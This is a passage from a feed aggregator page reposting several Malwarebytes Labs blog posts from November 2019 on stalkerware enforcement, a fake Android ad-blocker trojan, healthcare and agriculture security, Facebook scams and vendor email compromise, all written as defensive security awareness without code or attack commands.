
According to 2016 data from the Data & Society Research Institute and the Center for Innovative Public Health Research, an astonishing 8 percent of all US Internet users had been cyberstalked at some time in their lives. Further, 14 percent of Internet users under the age of 30 reported they’d been cyberstalked, which included 20 percent of women under 30.

ThinkProgress wrote that the data it collected is not ironclad. The data represented cases in which cyberstalking or online harassment were the first charge listed in an indictment. Also, because of how the federal statute on cyberstalking is written, the prosecutions include cases in which stalking happened through more physical means, like through a phone or through the mail.

Still, when ThinkProgress showed its data to Citron, she remarked: “That’s pathetic.”

Mary Anne Franks, professor of law at the University of Miami School of Law and vice-president of the Cyber Civil Rights Initiative, echoed Citron’s statements.

“Anecdotally, we’ve definitely heard that law enforcement generally, and the FBI in particular, is not interested in the vast majority of cases,” Franks told the outlet.

The FBI, however, only investigates crimes with a federal nexus, and quite often, the potential crimes committed in tandem with the use of stalkerware break state laws, which are to be investigated by local police.

There, different obstacles arise.

Local breakdown

As we’ve seen, the federal response to stalkerware—and to cyberstalking and online harassment—is limited. Researchers claim that US Attorneys are uninterested in prosecuting charges of cyberstalking and online harassment, and federal agencies, like the FBI and FTC, have jurisdictional limits to their investigations.

But what about at the state level, where victims can work with local police, who in turn can obtain evidence of illegal behavior, and then recommend charges and prosecution to a county’s District Attorney office?

When looking at how local law enforcement agencies respond to crimes in which stalkerware could play a role, human struggles emerge, said Maureen Curtis, vice president for the criminal justice and court programs for Operation Safe Horizon. Some of those struggles include: both victim and local law enforcement not understanding how stalkerware could be used in stalking situations, difficulty in collecting strong evidence of cyberstalking, and fear that contacting the police will make the situation worse.

Curtis has worked with the New York Police Department to train countless officers on domestic violence victim safety, offender accountability, housing options, and the criminal justice response to domestic violence. She said that her office has seen a shift stalking behavior, from a previously physical crime to one today that includes text messages, GPS tracking, and calls made from spoofed phone numbers.

It is, she said, much more “invisible,” which makes it much harder to track and much harder to find evidence on. 

“When I think about domestic violence and sexual assault and the way the criminal justice responds, there are still crimes where the onus is on the victim to show they’re a victim—definitely with stalking,” Curtis said. “It can be very difficult, particularly now, when it’s more hidden and survivors don’t have the understanding of it—it leads to them not having the evidence they feel they need.”

But even when evidence is recorded, Curtis said, the reporting of this type of behavior depends on a tenuous relationship between domestic violence survivors and the police who patrol their communities.

“Some survivors don’t want criminal prosecution—they want the [violence] to stop, and they might think that contacting the police will escalate [the situation],” Curtis said. She said that many survivors also have to consider the consequences of having their abuser arrested or sent to prison.

“If the [abuser] is an immigrant, they could be deported. If they’re working, they could lose their job,” Curtis said. She said the concerns pile up for communities of color, too. “Here in New York City, if I’m a woman of color, I may be afraid of calling the police because I’m afraid what might happen to my partner. Or I fear that, if I have children, and I call the police, they may call the child welfare authority and now I have another system involved in my life.”

Unfortunately, the frustrations can continue when a survivor decides to work with law enforcement to attempt to bring charges against an individual, Curtis said, because police can recommend charges be made, but they’re not the ones to actually prosecute. That job falls to local district attorneys.

“The police can get frustrated because, even if they write someone up, the district attorney may not feel there’s enough evidence, so the police get declined prosecution, which frustrates the police department,” Curtis said. “It’s a vicious cycle.”

What to do?

In 2015, then-Democratic Senator Al Franken reintroduced a federal bill to ban the development, use, and sale of GPS-stalking apps, creating a potential legislative solution to both the creation and use of some types of stalkerware.

At the time, Sen. Franken stressed the bewildering fact that many of the apps that enabled illegal activity were, themselves, not illegal.

“[The legislation] will help a whole range of people affected by cyberstalking, including survivors of domestic violence, and it would finally outlaw unconscionable—but perfectly legal—smartphone apps that allow abusers to secretly track their victims,” Sen. Franken said.

Introduced in the Senate, the bill was referred to the Judiciary Committee, where it stalled.  

When asked if federal legislation was the right path forward to solving the many issues in catching stalkerware abusers, cyberstalkers, and online harassers, Curtis said that new laws might help, but she had separate advice: Get the industry to do its part.

Years ago, Curtis’ office had an arrangement with Verizon, she said, in which Operation Safe Horizon could work with the phone provider to get a domestic abuse survivor’s phone number changed, free of charge. She also pointed to a free event at the New York City Family Justice Center, happening this year, in which Cornell University researchers are offering a “digital privacy check-up,” which includes a scan for “spyware.”

She said cybersecurity vendors could learn from that.

“I would imagine that, if there’s a way of putting malware onto a device, the people who really understand the tech can find it and get rid of it,” Curtis said.

She stressed that any company that wants to help must remember to provide its services for free, as many domestic violence survivors suffer from limited resources. The best part about companies getting involved, Curtis said, is that it provides an entirely new, separate avenue for relief:

“It will work whether you want to involve the criminal justice system or not.”

The post Stalkerware’s legal enforcement problem appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stealthy new Android malware poses as ad blocker, serves up ads instead

Malwarebytes - Thu, 11/14/2019 - 19:51

Since its discovery less than a month ago, a new Trojan malware for Android we detect as Android/Trojan.FakeAdsBlock has already been seen on over 500 devices, and it’s on the rise. This nasty piece of mobile malware cleverly hides itself on Android devices while serving up a host of advertisements: full-page ads, ads delivered when opening the default browser, ads in the notifications, and even ads via home screen widget. All while, ironically, posing as an ad blocker vaguely named Ads Blocker.

Upon installation: trouble

Diving right into this mobile threat, let’s look at its ease of infection. Immediately upon installation, it asks for Allow display over other apps rights.

This is, of course, so it can display all the ads it serves.

After that, the app opens and asks for a Connection request to “set up a VPN connection that allows it to monitor network traffic.” Establishing a VPN connection is not unusual for an ad blocker, so why wouldn’t you click OK? 

To clarify, the app doesn’t actually connect to any VPN.  Instead, by clicking OK, users actually allow the malware run in the background at all times.

Next up is a request to add a home screen widget.

This is where things get suspicious. The added widget is nowhere to be found. On my test device, it added the widget to a new home screen page.  Good luck finding and/or clicking it though.

The fake ad blocker then outputs some jargon to make it look legit.

Take a good look, because this will most likely be the last time you’ll see this supposed ad blocker if you are one of the many unfortunate victims of its infection.

Extreme stealth

Ads Blocker is inordinately hard to find on the mobile device once installed. To start, there is no icon for Ads Blocker. However, there are some hints of its existence, for example, a small key icon status bar.

This key icon was created after accepting the fake VPN connection message, as shown above. As a result, this small key is proof that the malware is running the background.

Although hard to spot, another clue is a blank white notification box hidden in plain sight.

Warning: If you happen to press this blank notification, it will ask permission to Install unknown apps with a toggle button to Allow from this source. In this case, the source is the malware, and clicking on it could allow for the capability to install even more malware.

If you try to find Ads Blocker on the App info page on your mobile device to remove manually, it once again hides itself with a blank white box.

Luckily, it can’t hide the app storage used, so the floating 6.57 MB figure show above can assist in finding it. Unless you spot this app storage number and figure out which app it belongs to (by process of elimination), you won’t be able to remove Ads Blocker from your device.

Android malware digs in its fangs

This Android malware is absolutely relentless in its ad-serving capabilities and frequency. As a matter of fact, while writing this blog, it served up numerous ads on my test device at a frequency of about once every couple minutes. In addition, the ads were displayed using a variety of different methods.

For instance, it starts with the basic full-page ad:

In addition, it offers ads in the notifications:

Oh look, it wants to send ads through the default web browser:

Last, remember the request to add a widget to the home screen that seemed to be invisible? Invisible widget presents: even more ads.

The ads themselves cover a wide variety of content, and some are quite unsavory—certainly not what you want to see on your mobile device.

Infections on the rise

Needless to say, this stealthy Android malware that plasters users with vulgar ads is not what folks are looking for when they download an ad blocker. Unfortunately, we have already counted over 500 detections of Android/Trojan.FakeAdsBlock. Moreover, we collected over 1,800 samples in our Mobile Intelligence System of FakeAdsBlock, leading us to believe that infection rates are quite high. On the positive side, Malwarebytes for Android removed more than 500 infections that are otherwise exceedingly difficult to remove manually.

Source of infection

It is unclear exactly where this Android malware is coming from. The most compelling evidence we have is based on VirusTotal submission data, which suggests the infection is spreading in the United States. Most likely, users are downloading the app from third-party app store(s) looking for a legitimate ad blocker, but are unknowingly installing this malware instead.

Moreover, from the filenames of several submissions, such as Hulk (2003).apk, Guardians of the Galaxy.apk, and Joker (2019).apk., there’s also a connection with a bogus movie app store as another possible source of infection.

Additional evidence demonstrates the Android malware might also be spreading in European countries such as France and Germany. A forum post was created on the French version of regarding Ads Blocker, and a German filename was submitted to VirusTotal. 

A new breed of mobile malware

A new breed of stealthy mobile malware is clearly on the uptick. Back in August, we wrote about the hidden mobile malware xHelper, which we detect asAndroid/Trojan.Dropper.xHelper. At that time, xHelper had already been removed from 33,000 mobile devices—and the numbers continue to grow. Ads Blocker is even more stealthy and could easily reach the same rate of infection.

You can call it shameless plugging if you like, but this trend of stealthy Android malware highlights the necessity of a good mobile anti-malware scanner, like Malwarebytes. With more and more users turning to their mobile phones for banking, shopping, storing health data, emailing, and other sensitive, yet important functions, protecting against mobile malware has become paramount. Beware of third-party app stores, yes, but have backup in case apps like Ads Blocker have you fooled.

Stay safe out there!

The post Stealthy new Android malware poses as ad blocker, serves up ads instead appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs report finds cyberthreats against healthcare increasing while security circles the drain

Malwarebytes - Wed, 11/13/2019 - 13:00

The team at Malwarebytes Labs is at it again, this time with a special edition of our quarterly CTNT report—Cybercrime tactics and techniques: the 2019 state of healthcare. Over the last year, we gathered global data from our product telemetry, honeypots, threat intelligence, and research efforts, focusing on the top threat categories and families that plagued the medical industry, as well as the most common attack vectors used by cybercriminals to penetrate healthcare defenses.

What we found is that healthcare-targeted cybercrime is a growing sector, with threats increasing in volume and severity while highly-valuable patient data remains unguarded. With a combination of unsecured electronic healthcare records (EHR) spread over a broad attack surface, cybercriminals are cashing in on industry negligence, exploiting vulnerabilities in unpatched legacy software and social engineering unaware hospital staff into opening malicious emails—inviting infections into the very halls constructed to beat them.

Our report explores the security challenges inherent to all healthcare organizations, from small private practices to enterprise HMOs, as well as the devastating consequences of criminal infiltration on patient care. Finally, we look ahead to innovations in biotech and the need to consider security in their design and implementation.

Key takeaways: the 2019 state of healthcare

Some of the key takeaways from our report:

  • The medical sector is currently ranked as the seventh-most targeted global industry according to Malwarebytes telemetry gathered from October 2018 through September 2019.
  • Threat detections have increased for this vertical from about 14,000 healthcare-facing endpoint detections in Q2 2019 to more than 20,000 in Q3, a growth rate of 45 percent.
  • The medical industry is overwhelmingly targeted by Trojan malware, which increased by 82 percent in Q3 2019 over the previous quarter.
  • While Emotet detections surged at the beginning of 2019, TrickBot took over in the second half as the number one threat to healthcare today.
  • The healthcare industry is a target for cybercriminals for several reasons, including their large databases of EHRs, lack of sophisticated security model, and high number of endpoints and other devices connected to the network.
  • Consequences of a breach for the medical industry far outweigh any other organization, as stolen or modified patient data can put a stop to critical procedures, and devices locked out due to ransomware attack can result in halted operations—and sometimes even patient death.
  • New innovations in biotech, including cloud-based biometrics, genetic research, and even advances in prosthetics could broaden the attack surface on healthcare and result in far-reaching, dire outcomes if security isn’t baked into their design and implementation.

To learn more about the cyberthreats facing healthcare and our recommendations for improving the industry’s security posture, read the full report:

Cybercrime tactics and techniques: the 2019 state of healthcare

The post Labs report finds cyberthreats against healthcare increasing while security circles the drain appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Vital infrastructure: securing our food and agriculture

Malwarebytes - Tue, 11/12/2019 - 20:06

I don’t expect to hear any arguments on whether the production of our food is important or not. So why do we hardly ever hear anything about the cybersecurity in the food and agriculture sector?

Depending on the country, agriculture makes up about 5 percent of the gross domestic product. That percentage is even bigger in less industrial countries. That amounts to a lot of money. And that’s just agriculture. For every farmer, 10 others are employed in related food businesses.

In fact, the food and agriculture sector is made up of many different contributors—from farmers to restaurants to supermarkets and almost every imaginable step in between. They range in size from a single sheepherder to multinational corporations like Bayer and Monsanto.

With a growing population and a diminishing amount of space for agriculture, the sector has grown to rely on more advanced techniques to meet the growing demands for agricultural products. And these techniques rely on secure technology to function.

Precision agriculture

Precision agriculture is an advanced form of agriculture, and as such, it uses a lot of connected technology. This basically puts it in the same risk category as household IoT devices. When looking at these devices from a security standpoint, it doesn’t matter a whole lot whether you are dealing with a web printer or a milking machine.

The connected technologies that are in use in agriculture mostly rely on remote sensing, global positioning systems, and communication systems to generate big data, analytics, and machine learning.

The main threats to this type of technology are denial-of-service attacks and data theft. With limited availability of bandwidth in some rural areas, communication loss may be caused by other factors outside a cyberattack— which makes it all the more important to have something to fall back on.

Data protection and data recovery are different entities but so closely related that solutions need to account for both. Data protection mostly comes down to management tools, encryption, and access control. Recovery requires backups or roll-back technology, which is easy to deploy and the backups require the same protection as the original data.

Supply chain

The supply chain for our food is variable, ranging from farmer’s supplies to the supermarket where we buy our food. Depending on the type of food, the chain can be extremely short (farm-to-table) or quite long. You may find a pharmaceutical giant like Bayer as a supplier for a farmer, but also as a manufacturer that gets its raw materials from farmers. Recently, Bayer was the victim of a cyberattack, which was likely aimed at industrial espionage.

Given the sensitive nature of the food supply chain which directly influences our health and happiness, it is only natural that we want to control the security of every step in the process. In order to do so, we look at suppliers other than those of physical goods and systems.

Financial institutions, for example, are heavily invested in agriculture, since it is one of the largest verticals. Back in 2012, a hacking group installed a Remote Access Trojan (RAT) on the computer of an insurance agent and used it to gain access to and steal reports and documents related to sales agents, as well as thousands of sent and received emails and passwords from Farmers Insurance.

Traceability across the supply chain is increasingly in demand by the public and sellers of the end-products. They want to know not only where the ingredients or produce came from, but when the crop was harvested and how they were grown and treated before they ended up on stores’ shelves.

Physical protection

Besides disrupting the industry supply chain, cyberattacks could potentially be used to harm to consumers or the environment. An outbreak of a disease and the consequential fear of contamination could devastate a food processor or distributor.

Given the number of producers and their spread across the country, a nationwide attack as an act of war or terrorism seems farfetched. But sometimes undermining the trust of the population in the quality of certain products can serve as a method to spread unrest and insecurity.

We have seen such attacks against supermarkets where a threat actor threatens to poison a product unless the owner pays up. In Germany, for example, a man slipped a potentially lethal poison into baby food on sale in some German supermarkets in an extortion scheme aimed at raising millions of Euros.

In Mexico, a drug cartel used government information about one of the most lucrative crops, avocado, to calculate how much “protection money” they could ask of its farmers, implying they would kidnap family members if they didn’t pay.

Cybersecurity for food

In the food and agriculture sector, cybersecurity has never been a prominent point of attention. But you can expect the technology used in precision agriculture to become a target of cybercriminals, especially if resources become more precious. Whether they would hold a system hostage until the farmer pays or whether they would abuse connected devices in a DDoS attack, cybercriminals could take advantage of lax security measures if the industry doesn’t sit up and take notice.

The use of big data to enhance production and revenue makes sense, but with the use of big data comes the risk of data corruption or theft.

Meanwhile, the food and agriculture sector is operating in chains and is dependable on other chain organizations or third parties. What is true for any chain is that it is only as strong as its weakest link, which in this case tends to be single farmers or small businesses. And as in most sectors, budgets of small businesses are tight, and cybersecurity is somewhere near the bottom of the list in spending. Even though an attack on expensive farming equipment could be costly, Not to mention shutting a company down for a while in a ransomware type of attack.

You’ve got that backwards

As the farming equipment industry has no problem forcing farmers to have their maintenance done by authorized dealers, farmers have resorted to installing firmware of questionable origin on their tractors to avoid paying top dollar for repairs and maintenance. This opens up a whole new avenue for cybercriminals to get their malware installed by the victims themselves. Apparently, all you have to do is offer it up as John Deere firmware on an online forum. You can even get paid for selling the software and then collect a ransom to get the tractor operational again as a bonus.


While farmers are renowned to cooperate when buying and selling goods, and to exchange information about illnesses and diseases, there is no such initiative when it comes to sharing information about cyberthreats and how to thwart them. Setting up such an initiative might be a first step in the right direction.

In our society being able to track back where a product or its ingredients came from becomes more important. Implementing the traceability could be an ideal moment to couple it with data security.

For the same reason as with household IoT devices manufacturers should be held accountable for providing an acceptable level of security or the possibility to apply such a level into their products. No hardcoded credentials, hard to change passwords, or weak default security settings.

Stay safe everyone!

The post Vital infrastructure: securing our food and agriculture appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Facebook scams: Bad ads, bogus grants, and fake tickets lurk on social media giant

Malwarebytes - Mon, 11/11/2019 - 18:27

We recently highlighted new steps Instagram is taking to try and clamp down on scammers sending fake messages on their platform. It turns out, other social media giants are walking a similar path for a variety of bogus ads and other attacks. Facebook scams in particular have taken off, despite the company’s efforts to stamp them out.

Facebook is now extending a rollout of their bogus ad reporting tool to Australia, after a variety of popular Australian celebrities kept appearing in fake ads. Regular readers may remember the genesis of this reporting tool being a similar incident in the UK involving popular consumer advice expert Martin Lewis.

Facebook’s ad reporting tool will allow Australian users to flag dodgy investment schemes or hard-to-cancel product trials—this alongside the corporation’s claims to have already shut down some 2.2 billion fake accounts worldwide.

While this is certainly welcome news for users of the social media platform, there’s still an awful lot of bad ads currently in circulation outside of these fake offers and adverts. Below, we’ll lead you through some of the more popular and current Facebook scams, such as efforts to hijack your social media account, swipe personal information, and of course, part you from your money.

Rogue ad campaigns

Scammers will happily compromise social media accounts, and then use them to purchase thousands of dollars of ad space before they can be shut down. In the examples given, one victim only had the ad campaign shut down because his credit card expired—else he feared he’d have been hit by $10,000 in credit card debt. Another had adverts running for about $1,550 per day until notified by PayPal. Ironically, one of the victims runs a business focused on privacy-themed adverts.

Some of the bogus ads listed certain items at a cheap price to make it look as though it had to be a pricing error of some sort. This is a common tactic going back many years, but the twist here is that the landing pages contained credit card skimmers so anyone paying up for a bargain had their payment details swiped instead.

Concert ticket fakeouts

Facebook is a popular place for some social event wheeling and dealing, especially in dedicated groups and fan pages. It turns out fake messages advertising non-existent tickets are also, sadly, quite popular.

Here’s how it works: Facebook scammers wait for an event coming up, the smaller the better to fly under the radar. At this point, they cut and paste the same bogus “I have free tickets but I can’t make it” message and wait for the replies to come flooding in. They’ll list the typical reasons why they can’t go: “I’m out of town”, “I’m undergoing surgery”, or“there’s a family emergency.”

If you spend enough time digging around, you’ll likely see the same cut and paste missive posted by multiple, supposedly independent accounts. One quick dubious money transfer later and you’ll be out of pocket with no tickets to show for it. Keeping track of event organiser pages when looking for tickets is a must to ensure you don’t fall for the same scam.

Clones, messenger grant scams, and lottery shenanigans

The old problem of “cloned” accounts rears its ugly head once more. Cloning happens when a scammer can’t gain control of a genuine social media account, so they do the next best thing—steal the photo, the bio, and any other pertinent information to replicate the real thing. From there, they try to social engineer their way into the victim’s bank balance.

The smartest part about these Facebook scams is the cloning and mapping out of potential contacts to try and trick. After that, tactics fall back to the more mundane. Scammers will message contacts with: “I’ve been in an accident and need help”or “I’m overseas and have lost my wallet” pleas for help. In this case, “A grant is available” is a commonplace and quite an old technique. The current keywords to set off alarm bells include gift cards, world bank, and grants. If you see any of those suddenly dropped into a conversation, it’s almost certainly going to be a scam.

If in doubt, check that the person talking to you is actually in your friends list—clones won’t be. Additionally, if it is genuinely your friend that doesn’t mean the danger is over. What it actually means is that they were probably compromised and don’t know about it. In both cases, find an alternate means to get in touch and verify the who, what, when, where, and why.

Lottery messenger scams work along similar lines. They claim you’ve won a prize, but once you’ve contacted a third party to claim your winnings, you’ll find you need to send them money for a variety of not quite plausible reasons. Often, the profiles telling you that you’ve won will imitate Mark Zuckerberg.

Don’t get fooled on Facebook

Looping back around to our initial fake Facebook ad problem, you can read a little more about how they operate under the hood over on BuzzFeed. We’ve covered many Facebook fakeouts down the years, our most recent being the wave of bogus Ellen profiles pushing movie streaming services.

The good news is that most, if not all, of these Facebook scams have been done before. If you’re not sure, a quick search will reveal prior examples covered on news sites, security blogs, or forum posts.

Always be cautious, remember the old “if it’s too good to be true, it probably is” routine, and keep yourself scam free on social media.

The post Facebook scams: Bad ads, bogus grants, and fake tickets lurk on social media giant appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (November 4 – November 10)

Malwarebytes - Mon, 11/11/2019 - 16:38

Last week on Malwarebytes Labs, we announced the launch of Malwarebytes 4.0, tackled data privacy legislation, and explored some of the ways robocalls come gunning for your data and your money. We also laid out the steps involved in popular vendor email compromise attacks.

Other cybersecurity news
  • Bug bounty bonanza: Rockstar Games open up their bounty program to include the newly-released Red Dead Redemption 2 on PC. (Source: The Daily Swig)
  • The fake news problem: A study shows it’s bad news for people thinking they can avoid bogus information on social networking portals. (source: Help Net Security)
  • On trial for hacking…yourself? A very confusing story involving a judge, their office computer, and a lesson learned in workplace computer forensics. (Source: The Register)
  • Who’s there? A security flaw: an Internet-connected doorbell causes headaches for owners. (Source: CyberScoop)
  • More fake ads on Facebook: An old scam returns to imitate the BBC and fool eager clickers. (Source: Naked Security)
  • Social media spy games: an Ex-Twitter employee stands accused of spying for Saudi Arabia. (Source: Reuters)
  • Cities power down: Johannesburg up and running after a cyberattack. (Source: BusinessTech)
  • Sextortion attacks still causing trouble: A new report claims these insidious scams are still bringing grief to the masses. (Source: Tricity news)
  • Space-based infosec: If you were wondering how space factors into the US national cyber strategy, then this article will probably be helpful. (Source: Fifth Domain)

Stay safe, everyone!

The post A week in security (November 4 – November 10) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Not us, YOU: vendor email compromise explained

Malwarebytes - Thu, 11/07/2019 - 21:49

Silent Starling, an online organized criminal group hailing from West Africa, seem to have reminded SMBs and enterprises alike the perils of business email compromise (BEC) scams once more. This time, they’ve advanced BEC into a more potent modality by widening the scope of its potential targets and methodically preparing for the attack from timing to execution. Thus, vendor email compromise (VEC) is born.

If you may recall, BEC is a form of targeted social engineering attack against institutions by baiting certain staff members—usually a CFO or those in the finance, payroll, and human resource departments—who either have access to company monetary accounts or the power to make financial decisions.

A BEC campaign always starts off with an email, either phishing or a spoofed email. Some BEC scams wants money from the get-go while others are more interested in sensitive information, such as W-2 forms.

BEC is remarkably effective at ensnaring victims. Although it may seem like mere trickery, an impressive level of sophistication is actually put into these campaigns to succeed. In fact, a typical BEC campaign so closely follows the kill chain framework used by advanced persistent threats (APTs) that it is deemed APT-like. As such, BEC deserves attention worthy of an APT attack.

So if BEC is already sophisticated enough to warrant APT-level protection, where does that leave businesses hit vendor email compromise?

BEC changed targets and gets a new name?

Before we launch into logistics of how to protect against VEC, let’s rewind and unpack naming conventions.

It’s true that scam campaigns change targets all the time and on occasion, in a heartbeat. But this particular scam evolution is quite unconventional because the amount of resources required to pull off a highly-successful VEC attack are easily quadruple that of a traditional BEC scam. To look at it another way, threat actors have introduced more friction into their operation instead of removing or minimizing it. However, they’ve also opened up the capacity to inflict far more damage to the target organization and to businesses worldwide.

While a typical BEC campaign baits one staff member at-a-time to extract money from a targeted organization, a VEC scam doesn’t go after a company for their money. Instead, VEC scammers look to leverage organizations against their own suppliers.

It’s typical for global brands to have hundreds of thousands of suppliers around the world. Proctor & Gamble, for example, has at least 50,000 company partners. This translates to at least 50,000 potential victims if VEC scammers can get a foothold in Proctor & Gamble’s systems. And these aren’t 50,000 individuals—it’s 50,000 organizations open to compromise.

This seems like a surefire money-making scheme, but it costs VEC scam operatives much more time and effort to sift through and study communication patterns based on thousands of current and archived email correspondences between the target business and their supply chain.

Okay, now I’m listening. How does VEC work?

According to the Agari Cyber Intelligence Division (ACID), the cybersecurity bod that has been engaging with Silent Starling for a time and recently put out a dossier about the group, the VEC attack chain this scam group follows is made up of three key phases.

  • Intrusion. This is where scammers attempt to compromise business email accounts of vendors in a variety of ways, such as phishing. Once successful, scammers move to phase two.
  • Reconnaissance. This is where scammers sit tight and go on “active waiting” mode. While doing so, they gather intel by sifting through archived emails, which may number in the thousands, and create email forwarding and/or redirect rules on the compromised accounts to have copies sent to email accounts the scammers control. They take note of dates so they know the timing, billing practices, the look of recognized official documents, or other information they can use for the success of the attack.
  • Actions on objectives. This is where they launch the VEC attack. The scammer/impersonator makes sure that they are contacting the right person in the targeted supplier company; the email content they create has high fidelity, meaning that it closely resembles typical vendor wording and communication style; and the timing is as consistent as possible with previous correspondences. Doing these checks and balances make VEC exceedingly difficult to detect.

We’d like to add that reconnaissance also happens before the intrusion phase, in which VEC scammers gather intel on companies they want to target, particularly those whose accounts they can attempt to compromise.

How can business owners protect against VEC and BeC?

Business owners should address these types of online threats before they happen, while they are happening, and after they happen.


Remember that scams—these included—target people. In particular, they take advantage of what your people don’t know. That said, awareness of the existence of VEC, BEC, and other account takeover campaigns should be the first order of business.

Organizations must ensure that all members of staff, from the newly-hired and contractual employee to the CEO, should at least have background knowledge on what these scams are, how they work, what the scam mails they use look like, who are the key persons in the company threat actors would target, and what these key persons can do if or when they ever receive is a suspicious email.

Furthermore, it pays to familiarize employees with proper business procedures on how funds and/or sensitive information should be requested.

Establishing policies and procedures for business conducted over email should be in place, if there aren’t already. Organizations can build these around the assumption that the requesting party is not who they are and that they must verify who they claim they are. Think of it as an internal two-step verification process. This can be as simple as calling the boss or supplier using their contact number in record or requiring another person to authorize the request.

Also consider including a “no last-minute urgent fund request” from higher ups. If this is unavoidable for some reason, a rigorous verification process must be in place and upheld in the event of such a request. The higher up making the request must know the process and expect to undergo it.


It’s possible for highly-sophisticated scams to tick all the verification boxes—until they don’t. Remember that in these particular scams, there will always be something different that will stand out. It could be the sender’s name, signature, or the email address itself, but usually it’s the sudden change in account details that raises the alarm. Heed this alarm and call the supplier or vendor making the financial request—a video call would be ideal if possible—to confirm once more if they have submitted the request.


In the event that fraud is discovered after the financial request is fulfilled, begin the recovery process right away. Call your bank and request that they talk to the bank where the transfer was sent. If your business is insured, call your insurers and company shareholders. Lastly, reach out to local law enforcement and the FBI.

While things may be chaotic at this point, organizations must remember to document everything that has happened while gathering evidence. This is information that is not only essential during investigations but can also be used as material for training employees. It may not seem like it, but successful cyber and scam attacks are invaluable experiences organizations can learn from.

Furthermore, assess if sensitive information has been stolen as well. If so, mitigate according to the type of information stolen so that it can never be used to harm the company, its assets, and its people.

Lastly, if your company is not using one (or some) already, consider investing in security tools with advanced configuration options that could detect and nip BEC and VEC scams in the bud. Such technologies include email authentication technologies, like Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication Reporting and Conformance (DMARC).

Stay safe!

The post Not us, YOU: vendor email compromise explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds